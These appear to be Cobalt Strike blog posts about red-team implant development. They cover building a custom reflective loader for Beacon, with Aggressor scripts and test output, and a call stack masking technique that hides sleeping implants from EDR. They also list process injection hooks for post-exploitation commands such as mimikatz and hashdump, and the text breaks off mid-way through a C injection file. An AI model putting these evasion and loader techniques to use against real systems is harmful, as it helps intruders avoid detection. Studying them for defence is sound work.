Figure 6. A demonstration of how strings are created and stored with Compiler Explorer.

The first declaration uses an array initializer; this has been highlighted in yellow. The output window shows how move instructions are used to construct the string one byte at a time. This means that all the code is found within the .text section.

The next approach uses a string literal to initialize the data. As shown in the purple output, the bytes of the string are copied into the array from the .data section. This has been broken down and explained below.

lea    rax, QWORD PTR string$[rsp]     ; load the address of where the string will be on the stack (destination address)
lea    rcx, OFFSET FLAT:$SG2657        ; load the address of the string in the .data section (source address)
mov    rdi, rax                        ; save destination address into destination pointer (RDI)
mov    rsi, rcx                        ; save source address into source pointer (RSI)
mov    ecx, 12                         ; save the size of the string into the count register (ECX)
rep    movsb                           ; copy a single byte from [RSI] to [RDI] and repeat based on ECX (size of string)

In the final example, a char pointer is initialized with a string literal. As shown in the red output, it references the value in the .data section. This has also been broken down and explained below.

lea    rax, OFFSET FLAT:$SG2658        ; load the address of the string in the .data section
mov    QWORD PTR stringPtr$[rsp], rax  ; save the address of the string on the stack

After reviewing the above, we can see that the only real options for us when writing PIC are either to avoid using strings (not always possible) or to use the first approach in the example above.

char helloWorld[] = {'H','e','l','l','o',' ','W','o','r','l','d','\0'};

As with everything when writing PIC, this is a little clumsy and cumbersome. However, Evan McBroom has provided a very simple and elegant solution to this problem. Evan discovered that when using the constexpr specifier to initialize a char array with a string literal, the resulting string was constructed in the same fashion as the array initializer described above. The following screenshot demonstrates this with Compiler Explorer.

Figure 7. A demonstration of Evan McBroom’s PIC string with Compiler Explorer.

Evan wrapped this into two macros that can be used to create both ASCII strings and wide strings.

#define PIC_STRING(NAME, STRING) constexpr char NAME[]{ STRING }
#define PIC_WSTRING(NAME, STRING) constexpr wchar_t NAME[]{ STRING }

We have added these two macros to the template, as shown in the following example.

PIC_STRING(example, "[!] Hello World\n");
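
As a small usage sketch, the macro can be combined with a helper that avoids the C runtime. PicStrLen() and ExampleLength() are hypothetical names for this illustration. Whether the string is really built on the stack depends on the compiler and its settings, so it is worth confirming the generated code in a disassembler or Compiler Explorer.

```cpp
#include <cstddef>

#define PIC_STRING(NAME, STRING) constexpr char NAME[]{ STRING }

// Hypothetical helper: string length without calling strlen().
std::size_t PicStrLen(const char* s) {
    std::size_t length = 0;
    while (s[length] != '\0') {
        ++length;
    }
    return length;
}

std::size_t ExampleLength() {
    // Declared as a local array, so the loader never takes a pointer into .rdata.
    PIC_STRING(example, "[!] Hello World\n");
    return PicStrLen(example);
}
```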

Release Mode

The ability to develop and debug inside Visual Studio is great, but what about using this loader in production? The great thing about writing a PIC loader is that everything we need is located inside the resulting PE file’s .text section. This means we can use a simple Python script to extract our compiled executable’s .text section and voila, we have our UDRL!

Note: This is why we used the “Function Positioning” described earlier. We needed to ensure that our ReflectiveLoader() function was positioned correctly at the very start of the .text section, which becomes the very start of the UDRL (aka the loader).
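
The extraction step itself is straightforward. The sketch below shows the same idea in C++ for consistency with the rest of the template; it is not the script shipped with the kit. ExtractTextSection() and ReadLe() are hypothetical helpers, the offsets follow the standard PE/COFF header layout, and trimming the section to its VirtualSize is an assumption.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Read a little-endian integer of `width` bytes (caller checks bounds).
static std::uint32_t ReadLe(const std::vector<std::uint8_t>& d, std::size_t off, std::size_t width) {
    std::uint32_t value = 0;
    for (std::size_t i = 0; i < width; ++i) {
        value |= static_cast<std::uint32_t>(d[off + i]) << (8 * i);
    }
    return value;
}

// Hypothetical helper: returns the raw bytes of the .text section, or an empty vector on failure.
std::vector<std::uint8_t> ExtractTextSection(const std::vector<std::uint8_t>& pe) {
    if (pe.size() < 0x40 || pe[0] != 'M' || pe[1] != 'Z') return {};
    const std::size_t nt = ReadLe(pe, 0x3C, 4);                    // e_lfanew
    if (nt + 24 > pe.size() || std::memcmp(&pe[nt], "PE\0\0", 4) != 0) return {};
    const std::size_t sectionCount = ReadLe(pe, nt + 6, 2);        // NumberOfSections
    const std::size_t optionalSize = ReadLe(pe, nt + 20, 2);       // SizeOfOptionalHeader
    std::size_t header = nt + 24 + optionalSize;                   // first section header
    for (std::size_t i = 0; i < sectionCount; ++i, header += 40) {
        if (header + 40 > pe.size()) return {};
        if (std::memcmp(&pe[header], ".text\0\0\0", 8) != 0) continue;
        const std::size_t virtualSize = ReadLe(pe, header + 8, 4);
        const std::size_t rawSize = ReadLe(pe, header + 16, 4);
        const std::size_t rawOffset = ReadLe(pe, header + 20, 4);
        // Assumption: drop file-alignment padding by capping at VirtualSize.
        const std::size_t size = virtualSize < rawSize ? virtualSize : rawSize;
        if (rawOffset > pe.size() || size > pe.size() - rawOffset) return {};
        return std::vector<std::uint8_t>(pe.begin() + rawOffset, pe.begin() + rawOffset + size);
    }
    return {};
}
```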

There are many examples of Python scripts that do something similar; both TitanLdr and AceLdr have similar scripts in their respective repositories. We have also included a script in the Arsenal kit template called udrl.py. Visual Studio allows us to incorporate this script as a post-build event, so the Release build will automatically create udrl-vs.bin in the relevant Output Directory.

To simplify testing and development, udrl.py also facilitates shellcode execution. This allows you to quickly test the loader without having to go via the Teamserver. We’d strongly recommend using this frequently to test your work. When writing PIC, things will often work in Debug mode but not in Release mode. For example, you can easily be caught out by forgetting the constexpr specifier, by forgetting to initialize pointers, or by using strings that aren’t PIC.

C:\> py.exe udrl.py prepend-udrl .\beacon.x64.bin .\x64\Release\udrl-vs.exe

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1229
[+] Start Address: 0x1b690d90000
[+] Shellcode Executed

Note: Make sure to use the 32-bit version of Python when testing x86 loaders. It will save you a couple of minutes of confusion…

Previously we used the Double Pulsar approach to loading because it simplified our Development/Debugging and provided an alternate way to write a UDRL. However, there is no reason why we can’t still use the “original” UDRL workflow and simply replace Beacon’s default loader with the one we have created.

The UDRL-VS template contains an additional Build Configuration called “Release (Stephen Fewer)”. This Build Configuration still creates the same PIC loader, however, instead of using the LdrEnd() function to calculate the location of Beacon, it uses Stephen Fewer’s original approach of walking backward through memory to find the start address of the DLL that is being loaded (Beacon).
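
The backward walk can be illustrated with a portable sketch that operates on a byte buffer instead of live process memory. FindImageBase() and kNotFound are hypothetical names, and the sanity bounds on e_lfanew (at least 0x40, below 1024) are assumptions modelled on the checks commonly used in this style of loader.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kNotFound = static_cast<std::size_t>(-1);

// Hypothetical helper: walk backward from `start` until a plausible PE image
// base is found ("MZ" whose e_lfanew points at a "PE\0\0" signature).
std::size_t FindImageBase(const std::vector<std::uint8_t>& memory, std::size_t start) {
    if (memory.empty()) return kNotFound;
    if (start >= memory.size()) start = memory.size() - 1;
    for (std::size_t pos = start + 1; pos-- > 0;) {
        if (pos + 0x40 > memory.size()) continue;             // DOS header must fit
        if (memory[pos] != 'M' || memory[pos + 1] != 'Z') continue;
        std::uint32_t lfanew = 0;
        for (std::size_t i = 0; i < 4; ++i) {                  // little-endian e_lfanew
            lfanew |= static_cast<std::uint32_t>(memory[pos + 0x3C + i]) << (8 * i);
        }
        if (lfanew < 0x40 || lfanew >= 1024) continue;         // reject stray "MZ" bytes
        if (pos + lfanew + 4 > memory.size()) continue;
        if (std::memcmp(&memory[pos + lfanew], "PE\0\0", 4) == 0) return pos;
    }
    return kNotFound;
}
```

Checking the PE signature as well as the MZ bytes matters because the two-byte MZ sequence can easily occur by chance inside code or data.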

To make it easy to test this type of loader, we have also included an option in the script to overwrite Beacon’s default loader and execute the resulting payload.

C:\> py.exe stomp-udrl .\beacon.x64.bin ".\x64\Release (Stephen Fewer)\udrl-vs.exe"

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1277
[*] Found ReflectiveLoader - RVA: 0x17aa4       File Offset: 0x16ea4
[+] Success: Applied UDRL to DLL
[+] Start Address: 0x27239a20000
[+] Shellcode Executed
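
The RVA and file offset printed above differ because sections are laid out differently on disk and in memory. The sketch below shows the usual conversion and a simple in-place overwrite. The section values (virtual address 0x1000, raw pointer 0x400) are assumptions chosen because they reproduce the numbers in the output above; they are not taken from the actual Beacon DLL. stomp_loader is a hypothetical helper, not part of any shipped script.

```python
from typing import Iterable, Tuple

# (virtual_address, virtual_size, raw_pointer) for each section
Section = Tuple[int, int, int]


def rva_to_file_offset(rva: int, sections: Iterable[Section]) -> int:
    """Translate an RVA into an offset within the file on disk."""
    for virtual_address, virtual_size, raw_pointer in sections:
        if virtual_address <= rva < virtual_address + virtual_size:
            return rva - virtual_address + raw_pointer
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def stomp_loader(dll: bytes, file_offset: int, loader: bytes) -> bytes:
    """Overwrite the bytes at file_offset with the new loader."""
    end = file_offset + len(loader)
    if file_offset < 0 or end > len(dll):
        raise ValueError("loader does not fit inside the DLL at that offset")
    return dll[:file_offset] + loader + dll[end:]


# Assumed section layout; reproduces the RVA/offset pair in the output above.
sections = [(0x1000, 0x20000, 0x400)]
print(hex(rva_to_file_offset(0x17AA4, sections)))  # 0x16ea4
```

The sketch only checks that the loader stays within the bounds of the file. Whether it fits in the space occupied by the original ReflectiveLoader() function is a separate question that this example does not answer.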

Once your loader has been tested and works as expected, it can be used in combination with an Aggressor Script to make it operational. We don’t strictly need to use Aggressor; we could use a standalone script to create the payload. However, Aggressor Script has several functions that will simplify customization in subsequent posts, and it saves writing extra code.

We can use some very simple Aggressor Scripts to apply our loaders to Beacon. The following example demonstrates how to append Beacon to our loader (almost a carbon copy of the one used by TitanLdr/AceLdr).

set BEACON_RDLL_GENERATE {
    # Declare local variables
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Check the payload architecture
    if ($arch eq "x64") {
        $path = getFileProper(script_resource("x64"), "Release", "udrl-vs.bin");
    }
    else if ($arch eq "x86") {
        $path = getFileProper(script_resource("Release"), "udrl-vs.bin");
    }
    else {
        warn("Error: Unsupported architecture: $arch");
        return $null;
    }

    # Read the UDRL from the supplied binary file
    $fileHandle = openf( $path );
    $ldr = readb( $fileHandle, -1 );
    closef( $fileHandle );
    if ( strlen( $ldr ) == 0 ) {
        warn("Error: Failed to read udrl-vs.bin");
        return $null;
    }

    # Prepend UDRL to Beacon and output the modified payload.
    return $ldr . $beacon;
}

The following example demonstrates how to overwrite Beacon’s default loader with our own. We still read the loader in the same fashion, but this time we call setup_reflective_loader(). This function does the heavy lifting for us; it finds the current ReflectiveLoader() function in Beacon and replaces it with the one provided.

set BEACON_RDLL_GENERATE {
    # Declare local variables
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Check the payload architecture.
    if ($arch eq "x64") {
        $path = getFileProper(script_resource("x64"), "Release (Stephen Fewer)", "udrl-vs.bin");
    }
    else if ($arch eq "x86") {
        $path = getFileProper(script_resource("Release (Stephen Fewer)"), "udrl-vs.bin");
    }
    else {
        warn("Error: Unsupported architecture: $arch");
        return $null;
    }

    # Read the UDRL from the supplied binary file
    $fileHandle = openf( $path );
    $ldr = readb( $fileHandle, -1 );
    closef( $fileHandle );
    if ( strlen( $ldr ) == 0 ) {
        warn("Error: Failed to read udrl-vs.bin");
        return $null;
    }

    # Overwrite Beacon's ReflectiveLoader() with UDRL
    $payload = setup_reflective_loader($beacon, $ldr);

    # Output the modified payload.
    return $payload;
}

If we load either of the scripts above into Cobalt Strike and export a payload, we’ll see a message in the Script Console confirming that the custom loader was used. The resulting shellcode can then be used in combination with a Stage0 of your choosing.

Closing Thoughts

That concludes the first post of this series, Revisiting the UDRL. As part of this post we have created a Visual Studio project with several Quality of Life (QoL) improvements. We’re now able to develop, debug and operationalize both Stephen Fewer’s original reflective loader and the Double Pulsar concept for Cobalt Strike using Visual Studio. The template developed as part of this project can be found in the Arsenal Kit under udrl-vs in “kits”. In the next installment we’ll explore some evasive techniques as well as how to modify default behaviors.

Behind the Mask: Spoofing Call Stacks Dynamically with Timers

This blog introduces a PoC technique for spoofing call stacks using timers. Prior to our implant sleeping, we can queue up timers to overwrite its call stack with a fake one and then restore the original before resuming execution. Hence, in the same way we can mask memory belonging to our implant during sleep, we can also mask the call stack of our main thread. Furthermore, this approach avoids having to deal with the complexities of X64 stack unwinding, which is typical of other call stack spoofing approaches. 

The Call Stack Problem

The core memory evasion problem from an attacker’s perspective is that implants typically operate from injected code (ignoring any module hollowing approaches). Therefore, one of the pillars of modern detection is to monitor for the creation of threads which belong to unbacked (or ‘floating’) memory. This blog by Elastic is a good approximation to the state of the art in terms of anomalous thread detection from an EDR perspective. 

However, another implication of this problem for attackers is that all of the implant’s API calls will also originate from unbacked memory. By examining call stacks either at the time of a specific API invocation, or by proactively inspecting running threads (i.e. ones which are sleeping), suspicious call stacks can be identified via return addresses to unbacked memory.

This is one detection area which historically has not received a huge amount of focus/research in modern EDR stacks (in my experience). However, this is starting to change with the release of open-source tools such as Hunt-Sleeping-Beacons, which will proactively inspect “sleeping” threads to find call stacks with unbacked regions. This demonstrably provides a high confidence signal of suspicious activity; hence it is valuable to EDRs and something attackers need to seriously consider in their evasion TTPs.  

Call Stack Inspection at Rest

The first problem to solve from an attacker’s perspective is how to manipulate the call stack of a sleeping thread so that it can bypass this type of inspection. This could be performed by the actual thread itself or via some external mechanism (APCs etc.).  

Typically, this is referred to as “spoofing at rest” (h/t to Kyle Avery here for this terminology in his excellent blog on avoiding memory scanners). The first public attempt to solve this problem is mgeeky’s ThreadStackSpoofer, which overwrites the last return address on the stack. 

As a note, the opposite way to approach this problem is by having no thread or call stack present at all, à la DeathSleep. The downside of this technique is the potential for the repeated creation of unbacked threads (depending on the exact implementation), which is a much greater evil in modern environments. However, future use of Hardware Stack Protection by EDR vendors may make this type of approach inevitable.

Call Stack Inspection During Execution – User Mode

The second problem is call stack inspection during execution, which could either be implemented in user mode or kernel mode. In terms of user mode implementation, this would typically involve hooking a commonly abused function and walking the stack to see where the call originated. If we find unbacked memory, it is highly likely to be suspicious. An obvious example of this is injected shellcode stagers calling WinInet functions. MalMemDetect is a good example of an open-source project that demonstrates this detection technique. 

For these scenarios, techniques such as RET address spoofing are normally sufficient to remove any evidence of unbacked addresses from the call stack. At a high level, this involves inserting a small assembly harness around the target function which will manually replace the last return address on the stack and redirect the target function to return to a trampoline gadget (e.g. jmp rbx). 

Additionally, there is SilentMoonWalk which uses a clever de-syncing approach (essentially a ROP gadget built on X64 stack unwinding codes). This can dynamically hide the origin of a function call and will similarly bypass these basic detection heuristics. Most importantly to an operator, both these techniques can be performed by the acting thread itself and do not require any external mechanism. 

From an opsec perspective, it is important to note that many of the techniques referenced in this blog may produce anomalous call stacks. Whether this is an issue or not depends on the target environment and the security controls in place. The key consideration is whether the call stack generated by an action is being recorded somewhere (say in the kernel, see next section) and appended to an event/alert. If this is the case, it may look suspicious to trained eyes (i.e. threat hunters/IR). 

To demonstrate this, we can take SilentMoonWalk’s desync stack spoofing technique as an example (this is a slightly easier use case as other techniques can be implementation specific). As stated previously, this technique needs to find functions which implement specific stack unwinding operations (a full overview of X64 stack unwinding is beyond the scope of this blog but see this excellent CodeMachine article for further reading).

For example, the first frame must always perform a UWOP_SET_FPREG operation, the second a UWOP_PUSH_NONVOL (rbp) operation, and so on, as demonstrated in WinDbg below:

0:000> knf
#   Memory  Child-SP          RetAddr               Call Site 
00           0000001d`240feb98 00007ffe`b622d831     win32u!NtUserWaitMessage+0x14 
08        40 0000001d`240ff140 00007ffe`b483b576     KERNELBASE!CreatePrivateObjectSecurity+0x31 
09        40 0000001d`240ff180 00007ffe`b48215a5     KERNELBASE!Internal_EnumSystemLocales+0x406 
0a       3e0 0000001d`240ff560 00007ffe`b4870e22     KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
0b       680 0000001d`240ffbe0 00007ffe`b6d87614     KERNELBASE!PathReplaceGreedy+0x82 
0c       100 0000001d`240ffce0 00007ffe`b71826a1     KERNEL32!BaseThreadInitThunk+0x14 
0d        30 0000001d`240ffd10 00000000`00000000     ntdll!RtlUserThreadStart+0x21 

0:000> .fnent KERNELBASE!PathReplaceGreedy+0x82 
Debugger function entry 000001cb`dda19c60 for: 
(00007ffe`b4870da0)   KERNELBASE!PathReplaceGreedy+0x82   |  (00007ffe`b4871050)   KERNELBASE!SortFindString
  06: offs 13, unwind op 3, op info 2	UWOP_SET_FPREG.

0:000> .fnent KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
Debugger function entry 000001cb`dda19c60 for:  
(00007ffe`b4821580)   KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25   |  (00007ffe`b482182c)   KERNELBASE!AddTimeZoneRules 
08: offs b, unwind op 0, op info 5	UWOP_PUSH_NONVOL reg: rbp. 

This output shows the call stack for the spoofed SilentMoonWalk thread (knf) and the unwind operations (.fnent) for two of the functions found on the call stack (PathReplaceGreedy / SystemTimeToTzSpecificLocalTimeEx).

The key takeaway is that this results in a call stack which would never occur for a legitimate code path (and is therefore anomalous). That is, KERNELBASE!PathReplaceGreedy never calls KERNELBASE!SystemTimeToTzSpecificLocalTimeEx, and so on down the stack. Furthermore, an EDR could itself attempt to search for this pattern of unwind codes during a proactive scan of a sleeping thread. Again, whether this is an issue depends entirely on the controls/telemetry in place, but as operators it is always worth understanding the pros and cons of all the techniques at our disposal.

Lastly, a trivial way of calling an API with a ‘clean’ call stack is to get something else to do it for you. The typical example is to use any callback type functionality provided by the OS (same applies for bypassing thread creation start address heuristics). The limitation for most callbacks is that you can normally only supply one argument (although there are some notable exceptions and good research showing ways around this). 

Call Stack Inspection During Execution – Kernel Mode

A user mode call stack can be captured inline during any of the kernel callback functions (i.e. on process creation, thread creation/termination, handle access etc.). As an example, the SysMon driver uses RtlWalkFrameChain to collect a user mode call stack for all process access events (i.e. calling OpenProcess to obtain a HANDLE). Hence, this capability makes it trivial to spot unbacked memory/injected code (‘UNKNOWN’) attempting to open a handle to LSASS. For example, in this contrived scenario you would get a call stack similar to the following:

0:020> knf 
#       Memory    Child-SP           RetAddr               Call Site 
00                0000004c`453cf428  00007ffd`7f1006fe     ntdll!NtOpenProcess 
01           8    0000004c`453cf430  00007ff6`98fe937f     KERNELBASE!OpenProcess+0x4e 
02          70    0000004c`453cf4a0  000002ad`c3fd1121     000002ad`c3fd1121 (UNKNOWN) 
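
The check a defender runs against a stack like this can be sketched as a simple range lookup: any return address that does not fall inside a loaded module is unbacked. The addresses below are the ones that appear in the stack above, while the module names, base addresses and sizes are made up for illustration (a real tool would take them from the process's module list).

```python
from typing import Dict, List, Tuple


def find_unbacked(return_addresses: List[int],
                  modules: Dict[str, Tuple[int, int]]) -> List[int]:
    """Return every address that is not inside any (base, size) module range."""
    unbacked = []
    for addr in return_addresses:
        backed = any(base <= addr < base + size
                     for base, size in modules.values())
        if not backed:
            unbacked.append(addr)
    return unbacked


# Addresses from the stack above; the module ranges are hypothetical.
stack = [0x00007FFD7F1006FE, 0x00007FF698FE937F, 0x000002ADC3FD1121]
modules = {
    "KERNELBASE.dll": (0x00007FFD7F0D0000, 0x300000),
    "injector.exe": (0x00007FF698FE0000, 0x20000),
}
print([hex(a) for a in find_unbacked(stack, modules)])  # ['0x2adc3fd1121']
```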

Additionally, it is now possible to collect call stacks with the ETW threat intelligence provider. The call stack addresses are unresolved (i.e. an EDR would need to keep its own internal process module cache to resolve symbols), but they give EDR vendors the potential to capture near real-time call stacks (where the symbols are then resolved asynchronously). Therefore, this can be seen as a direct replacement for user mode hooking which is, critically, captured in the kernel. It is not unrealistic to imagine a scenario in the future in which unbacked/direct API calls to sensitive functions (VirtualAlloc / QueueUserAPC / SetThreadContext / VirtualProtect etc.) are trivial to detect.

These scenarios were the premise for some of my own previous research into call stack spoofing during execution. The idea was to offload the API call to a new thread, which we could initialise to a fake state, to hide the fact that the call originated from unbacked memory. My original PoC applied this idea to OpenProcess, but it could easily be applied to image loads etc.

The key requirement here was that any arbitrary call stack could be spoofed, so that even if a threat hunter was reviewing an alert containing the call stack, it would still look indistinguishable from other threads. The downsides of this approach were the need to create a new thread, how best to handle this spoofed thread, and the reliance on a hard coded / static call stack.

Call Stack Masking

Having given a brief review of the current state of research into call stack spoofing, this blog will demonstrate a new call stack spoofing technique: call stack masking. The PoC introduced in this blog post solves the spoofing at rest problem by masking a sleeping thread’s call stack via an external mechanism (timers).

While researching this topic in the past, I spent a large amount of time trying to get to grips with the complexities of X64 stack unwinding in order to produce TTPs to perform stack spoofing. This complexity is also present in a number of the other techniques discussed above. However, it occurred to me that there is a much simpler way to spoof/mask the call stack without having to deal with these intricacies. 

If we consider a generic thread that is performing any kind of wait, by definition, it cannot modify its own stack until the wait is satisfied. Furthermore, its stack is always read-writable. Therefore, we can use timers to:

  1. Create a backup of the current thread stack
  2. Overwrite it with a fake thread stack
  3. Restore the original thread stack just before resuming execution 
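
The three steps can be modelled with a toy example. The sketch below uses a bytearray as a stand-in for the thread stack and calls the steps one after another; in the PoC these steps are driven by timers while the target thread is waiting. The StackMasker class and its method names are hypothetical and exist only to show the ordering of backup, overwrite and restore.

```python
from typing import Optional


class StackMasker:
    """Toy model of backup / overwrite / restore over a bytearray 'stack'."""

    def __init__(self, stack: bytearray) -> None:
        self.stack = stack
        self._backup: Optional[bytes] = None

    def mask(self, fake: bytes) -> None:
        if len(fake) > len(self.stack):
            raise ValueError("fake stack is larger than the real stack region")
        # Step 1: back up the region that is about to be overwritten.
        self._backup = bytes(self.stack[:len(fake)])
        # Step 2: overwrite it with the fake stack.
        self.stack[:len(fake)] = fake

    def unmask(self) -> None:
        if self._backup is None:
            raise RuntimeError("nothing to restore")
        # Step 3: restore the original bytes before execution resumes.
        self.stack[:len(self._backup)] = self._backup
        self._backup = None
```

Because the waiting thread cannot touch its own stack until the wait is satisfied, nothing can observe the fake contents from inside the thread between mask() and unmask(); only an external inspector sees them.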

Any timer objects could be used, but for convenience I based my PoC on C5pider’s Ekko sleep obfuscation technique.

The only remaining challenge is to work out the value of RSP once our target thread is sleeping. This can be achieved using compiler intrinsics (_AddressOfReturnAddress) to obtain the Child-SP of the current frame. Once we have this, we can subtract the total stack utilisation of the expected next two frames (i.e. KERNELBASE!WaitForSingleObjectEx and ntdll!NtWaitForSingleObject) to find the expected value of RSP at sleep time.
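
The arithmetic is simple once the frame sizes are known. The sketch below uses the three-frame OpenProcess stack shown earlier purely as stand-in data, since its Memory column gives the stack used by each frame (0x70 and 0x8): starting from the caller's Child-SP and subtracting both values lands on the Child-SP of the innermost frame. The real sizes for KERNELBASE!WaitForSingleObjectEx and ntdll!NtWaitForSingleObject depend on the Windows build and are not given here, and the function name is hypothetical.

```python
from typing import Iterable


def expected_rsp_at_sleep(child_sp: int, frame_sizes: Iterable[int]) -> int:
    """Subtract the stack used by each subsequent frame from the current Child-SP."""
    return child_sp - sum(frame_sizes)


# Stand-in values taken from the OpenProcess stack earlier in this post.
child_sp = 0x0000004C453CF4A0   # Child-SP of the calling frame
frame_sizes = [0x70, 0x8]       # stack used by the next two frames
print(hex(expected_rsp_at_sleep(child_sp, frame_sizes)))  # 0x4c453cf428
```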

Lastly, to make our masked thread look as realistic as possible, we can copy the start address and call stack of an existing (and legitimate) thread.


The PoC can be found here:

The PoC operates in two modes: static and dynamic. The static mode contains a hard coded call stack that was found in spoolsv.exe via Process Explorer. This thread is shown below and can be seen to be in a state of ‘Wait:UserRequest’ via KERNELBASE!WaitForSingleObjectEx:

The screenshot below demonstrates static call stack masking. The start address and call stack of our masked thread are identical to the thread identified in spoolsv.exe above:

The obvious downside of the static mode is that we are still relying on a hard coded call stack. To solve this problem the PoC also implements dynamic call stack masking. In this mode, it will enumerate all the accessible threads on the host and find one in the desired target state (i.e. UserRequest via WaitForSingleObjectEx). Once a suitable thread stack is found, it will copy it and use that to mask the sleeping thread. Similarly, the PoC will once again copy the cloned thread’s start address to ensure our masked thread looks legitimate.
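
The selection logic of the dynamic mode can be sketched as a filter over thread records. The ThreadInfo structure, its field names and the frame strings below are all hypothetical; the PoC works against live threads, whereas this sketch only shows the matching rule (thread is in a UserRequest wait and WaitForSingleObjectEx is near the top of its stack).

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ThreadInfo:
    pid: int
    tid: int
    wait_reason: str
    frames: List[str]  # call stack, innermost frame first


def pick_thread_to_mimic(
    threads: List[ThreadInfo],
    required: str = "KERNELBASE!WaitForSingleObjectEx",
) -> Optional[ThreadInfo]:
    """Return the first thread waiting on a user request via `required`."""
    for thread in threads:
        if thread.wait_reason != "UserRequest":
            continue
        # The wait function should be one of the two innermost frames.
        if any(frame.startswith(required) for frame in thread.frames[:2]):
            return thread
    return None
```

Returning None when nothing matches leaves the caller free to fall back to the static, hard-coded call stack.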

If we run the PoC with the ‘–dynamic’ flag, it will locate another thread’s call stack to mimic as shown below: 

The target process (taskhostw.exe / 4520), thread (5452), and call stack identified above are shown below in Process Explorer:

If we now examine the call stack and start address of the main thread belonging to CallStackMasker, we can see it is identical to the mimicked thread:

Below is another example of CallStackMasker dynamically finding a shcore.dll based thread call stack from explorer.exe to spoof: 

The screenshot below shows the real ‘unmasked’ call stack:

Currently the PoC only supports WaitForSingleObject but it would be trivial to add in support for WaitForMultipleObjects.

As a final note, this PoC uses timer-queue timers, which I have previously demonstrated can be enumerated in memory. However, this PoC could be modified to use fully fledged kernel timers to avoid this potential detection opportunity.

Process Injection Update in Cobalt Strike 4.5

Process injection is a core component of Cobalt Strike post exploitation. Until now, the only option was to use a built-in injection technique using fork&run. This has been great for stability, but it does come at the cost of OPSEC.

Cobalt Strike 4.5 now supports two new Aggressor Script hooks: PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT.  These hooks allow a user to define how the fork&run and explicit injection techniques are implemented when executing post-exploitation commands instead of using the built-in techniques. 

The implementation of these techniques is through a Beacon Object File (BOF) and an Aggressor Script function.  In the next sections a simple example will be provided followed by an example from the Community Kit for each hook. 

These two hooks will cover most of the post exploitation commands, which will be listed in each section. However, there are some exceptions which will not use these hooks:

| Beacon Command | Aggressor Script function |
|---|---|
| execute-assembly | &bexecute_assembly |

Exceptions to the 4.5 process injection updates

Process Injection Spawn (Fork & Run)

The PROCESS_INJECT_SPAWN hook is used to define the fork&run process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The elevate, runasadmin, &belevate, &brunasadmin and [beacon] -> Access -> Elevate commands will only use the PROCESS_INJECT_SPAWN hook when the specified exploit uses one of the aggressor script functions listed in the table, for example &bpowerpick.
  2. For the net and &bnet commands, the ‘domain’ command will not use the hook.
  3. The “(use a hash)” note means select a credential that references a hash.

| Beacon Command | Aggressor Script function | UI Interface |
|---|---|---|
| dcsync | &bdcsync | |
| elevate | &belevate | [beacon] -> Access -> Elevate |
| | | [beacon] -> Access -> Golden Ticket |
| hashdump | &bhashdump | [beacon] -> Access -> Dump Hashes |
| keylogger | &bkeylogger | |
| logonpasswords | &blogonpasswords | [beacon] -> Access -> Run Mimikatz |
| | | [beacon] -> Access -> Make Token (use a hash) |
| mimikatz | &bmimikatz | |
| net | &bnet | [beacon] -> Explore -> Net View |
| portscan | &bportscan | [beacon] -> Explore -> Port Scan |
| powerpick | &bpowerpick | |
| printscreen | &bprintscreen | |
| pth | &bpassthehash | |
| runasadmin | &brunasadmin | |
| | | [target] -> Scan |
| screenshot | &bscreenshot | [beacon] -> Explore -> Screenshot |
| screenwatch | &bscreenwatch | |
| ssh | &bssh | [target] -> Jump -> ssh |
| ssh-key | &bssh_key | [target] -> Jump -> ssh-key |
| | | [target] -> Jump -> [exploit] (use a hash) |

Commands that support the PROCESS_INJECT_SPAWN hook in 4.5


The PROCESS_INJECT_SPAWN hook accepts the following arguments:

  • $1 Beacon ID 
  • $2 memory injectable DLL (position-independent code) 
  • $3 true/false ignore process token 
  • $4 x86/x64 – memory injectable DLL architecture 


The PROCESS_INJECT_SPAWN hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own fork&run injection technique. 
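
The return-value contract can be modelled as a small dispatcher. This is only a model of the behaviour described above, written in Python for illustration; it is not Cobalt Strike code, and run_fork_and_run and the two result strings are hypothetical names.

```python
from typing import Callable, Optional


def run_fork_and_run(hook: Optional[Callable[..., object]],
                     beacon_id: str, dll: bytes,
                     ignore_token: bool, arch: str) -> str:
    """Decide which technique runs based on what the hook returns."""
    result = hook(beacon_id, dll, ignore_token, arch) if hook else None
    # $null or an empty string: fall back to the built-in technique.
    if result is None or result == "":
        return "built-in"
    # 1 or any other non-empty value: the hook handled the injection itself.
    return "custom"
```

A hook can therefore opt out on a per-call basis, for example returning nothing for an architecture it does not support and letting the built-in technique handle that case.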

I Want to Use My Own spawn (fork & run) Injection Technique.

To implement your own fork&run injection technique you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_SPAWN hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_SPAWN hook to bypass the built-in default.  First, we will create a BOF with our fork&run implementation. 

File: inject_spawn.c

#include <windows.h>
#include "beacon.h"

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   STARTUPINFOA        si;
   PROCESS_INFORMATION pi;
   datap               parser;
